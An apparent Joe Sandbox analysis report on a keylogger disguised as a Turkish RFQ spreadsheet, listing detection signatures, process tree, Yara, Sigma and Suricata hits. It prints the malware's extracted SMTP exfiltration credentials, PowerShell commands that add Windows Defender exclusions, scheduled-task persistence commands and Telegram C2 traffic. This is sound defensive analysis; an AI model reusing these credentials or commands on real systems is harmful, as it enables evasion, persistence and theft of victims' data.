Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe

Overview

General Information

Sample name:2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
renamed because original name is a hash value
Original sample name:2025 5595 TEKLF STE - TBTAK SAGE RFQ_xlsx.exe
Analysis ID:1637262
MD5:226b9b93d3a16ddee2722fc32384d5ca
SHA1:59ee84345f971fb8fc3c09bf2905787e28e1bf97
SHA256:2e2f0dd7f4cff14d7889290ab1dea80e5fd3226b5eae0523c526d74396023866
Tags:exeuser-lowmal3
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe" MD5: 226B9B93D3A16DDEE2722FC32384D5CA)
    • powershell.exe (PID: 7920 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gNFUFfdz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5340 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 8000 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7380 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • gNFUFfdz.exe (PID: 7624 cmdline: C:\Users\user\AppData\Roaming\gNFUFfdz.exe MD5: 226B9B93D3A16DDEE2722FC32384D5CA)
    • schtasks.exe (PID: 3292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpAC7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gNFUFfdz.exe (PID: 2964 cmdline: "C:\Users\user\AppData\Roaming\gNFUFfdz.exe" MD5: 226B9B93D3A16DDEE2722FC32384D5CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "reportlogs@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "reportlogs@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.3650522497.000000000043D000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
      • 0x8aa0:$a1: get_encryptedPassword
      • 0x9028:$a2: get_encryptedUsername
      • 0x8713:$a3: get_timePasswordChanged
      • 0x882a:$a4: get_passwordField
      • 0x8ab6:$a5: set_encryptedPassword
      • 0xb7d2:$a6: get_passwords
      • 0xbb66:$a7: get_logins
      • 0xb7be:$a8: GetOutlookPasswords
      • 0xb177:$a9: StartKeylogger
      • 0xbabf:$a10: KeyLoggerEventArgs
      • 0xb217:$a11: KeyLoggerEventArgsEventHandler
      00000007.00000002.3653904508.00000000031C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 25 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          13.2.gNFUFfdz.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            13.2.gNFUFfdz.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              13.2.gNFUFfdz.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x2dca0:$a1: get_encryptedPassword
              • 0x2e228:$a2: get_encryptedUsername
              • 0x2d913:$a3: get_timePasswordChanged
              • 0x2da2a:$a4: get_passwordField
              • 0x2dcb6:$a5: set_encryptedPassword
              • 0x309d2:$a6: get_passwords
              • 0x30d66:$a7: get_logins
              • 0x309be:$a8: GetOutlookPasswords
              • 0x30377:$a9: StartKeylogger
              • 0x30cbf:$a10: KeyLoggerEventArgs
              • 0x30417:$a11: KeyLoggerEventArgsEventHandler
              13.2.gNFUFfdz.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
              • 0x2f064:$s1: UnHook
              • 0x2f06b:$s2: SetHook
              • 0x2f073:$s3: CallNextHook
              • 0x2f080:$s4: _hook
              9.2.gNFUFfdz.exe.3d2fc00.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 47 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", ParentImage: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ParentProcessId: 7828, ParentProcessName: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", ProcessId: 7920, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", ParentImage: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ParentProcessId: 7828, ParentProcessName: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", ProcessId: 7920, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpAC7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpAC7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\gNFUFfdz.exe, ParentImage: C:\Users\user\AppData\Roaming\gNFUFfdz.exe, ParentProcessId: 7624, ParentProcessName: gNFUFfdz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpAC7.tmp", ProcessId: 3292, ProcessName: schtasks.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", ParentImage: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ParentProcessId: 7828, ParentProcessName: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp", ProcessId: 8000, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", ParentImage: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ParentProcessId: 7828, ParentProcessName: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", ProcessId: 7920, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7380, ProcessName: svchost.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe", ParentImage: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ParentProcessId: 7828, ParentProcessName: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gNFUFfdz" /XML "C:\Users\user\AppData\Local\Temp\tmpC2F0.tmp", ProcessId: 8000, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-13T13:08:20.744950+010028033053Unknown Traffic192.168.2.449715104.21.96.1443TCP
                2025-03-13T13:08:23.363268+010028033053Unknown Traffic192.168.2.449720104.21.96.1443TCP
                2025-03-13T13:08:24.455444+010028033053Unknown Traffic192.168.2.449722104.21.96.1443TCP
                2025-03-13T13:08:25.833500+010028033053Unknown Traffic192.168.2.449724104.21.96.1443TCP
                2025-03-13T13:08:28.491264+010028033053Unknown Traffic192.168.2.449732104.21.96.1443TCP
                2025-03-13T13:08:31.154960+010028033053Unknown Traffic192.168.2.449737104.21.96.1443TCP
                2025-03-13T13:08:37.487461+010028033053Unknown Traffic192.168.2.449747104.21.96.1443TCP
                2025-03-13T13:08:40.124495+010028033053Unknown Traffic192.168.2.449751104.21.96.1443TCP
                2025-03-13T13:08:42.718580+010028033053Unknown Traffic192.168.2.449754104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-13T13:08:15.418364+010028032742Potentially Bad Traffic192.168.2.449710193.122.130.080TCP
                2025-03-13T13:08:18.527766+010028032742Potentially Bad Traffic192.168.2.449710193.122.130.080TCP
                2025-03-13T13:08:19.933989+010028032742Potentially Bad Traffic192.168.2.449716193.122.130.080TCP
                2025-03-13T13:08:21.324805+010028032742Potentially Bad Traffic192.168.2.449719193.122.130.080TCP
                2025-03-13T13:08:22.434052+010028032742Potentially Bad Traffic192.168.2.449716193.122.130.080TCP
                2025-03-13T13:08:23.834003+010028032742Potentially Bad Traffic192.168.2.449723193.122.130.080TCP
                2025-03-13T13:08:24.983142+010028032742Potentially Bad Traffic192.168.2.449725193.122.130.080TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-13T13:08:41.163844+010018100071Potentially Bad Traffic192.168.2.449752149.154.167.220443TCP
                2025-03-13T13:08:45.172824+010018100071Potentially Bad Traffic192.168.2.449755149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "reportlogs@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587"}
                Source: 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reportlogs@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeReversingLabs: Detection: 42%
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeVirustotal: Detection: 43%Perma Link
                Multi AV Scanner detection for submitted file
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeVirustotal: Detection: 43%Perma Link
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeReversingLabs: Detection: 42%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                Sample uses string decryption to hide its real strings
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpackString decryptor: reportlogs@wxtp.store
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpackString decryptor: 7213575aceACE@@
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpackString decryptor: mail.wxtp.store
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpackString decryptor: reportlog@wxtp.store
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpackString decryptor: 587
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpackString decryptor:

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49713 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49718 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: anmZ.pdb source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, gNFUFfdz.exe.0.dr
                Source: Binary string: anmZ.pdbSHA256 source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, gNFUFfdz.exe.0.dr
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 4x nop then jmp 030AF8E9h7_2_030AF630
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 4x nop then jmp 030AFD41h7_2_030AFA93
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0165F8E9h13_2_0165F631
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0165FD41h13_2_0165FA88
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 05502C19h13_2_05502968
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 055031E0h13_2_05502DC8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 05500D0Dh13_2_05500B30
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 05501697h13_2_05500B30
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550D7F9h13_2_0550D550
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 055031E0h13_2_0550310E
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 055031E0h13_2_05502DBE
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550DC51h13_2_0550D9A8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h13_2_05500040
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550FAB9h13_2_0550F810
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550D3A1h13_2_0550D0F8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550CF49h13_2_0550CCA0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550F209h13_2_0550EF60
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550EDB1h13_2_0550EB08
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550F661h13_2_0550F3B8
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550E501h13_2_0550E258
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550E0A9h13_2_0550DE00
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 0550E959h13_2_0550E6B0
                Source: C:\Users\user\AppData\Roaming\gNFUFfdz.exeCode function: 4x nop then jmp 05AD0338h13_2_05AD0040

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49755 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49752 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
